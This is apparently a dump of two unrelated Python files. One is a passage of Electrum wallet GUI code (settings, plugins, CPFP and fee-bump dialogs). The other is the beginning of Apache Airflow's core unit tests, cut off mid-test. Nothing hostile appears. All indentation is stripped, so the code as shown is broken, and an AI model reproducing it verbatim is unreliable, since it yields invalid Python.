+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
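# Plugins dialog: one row per available plugin with an enable checkbox, an optional
# per-plugin settings widget, and a help button showing the description and requirements.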
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
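# Child Pays For Parent: build a child transaction spending an unconfirmed output back
# to the wallet with a fee large enough to cover both transactions. The suggested fee
# is fee_per_kb * (parent_size + child_size) / 1000, capped at the output value.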
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
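# Replace-By-Fee bump: ask for a new (higher) fee, build a replacement transaction with
# wallet.bump_fee, and optionally mark it final so it can no longer be replaced.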
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
core.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
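# Remove any TaskInstance rows left over from previous runs of the test DAG so each
# test session starts from a clean database state.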
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, *args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag when a prior DagRun already exists with the same
run_id that the next scheduled run would use
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
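# The sleep duration encodes the test's PID so the spawned sleep process can be found
# unambiguously in the process table; if it is still alive after the timeout, the
# BashOperator failed to kill its subprocess.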
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
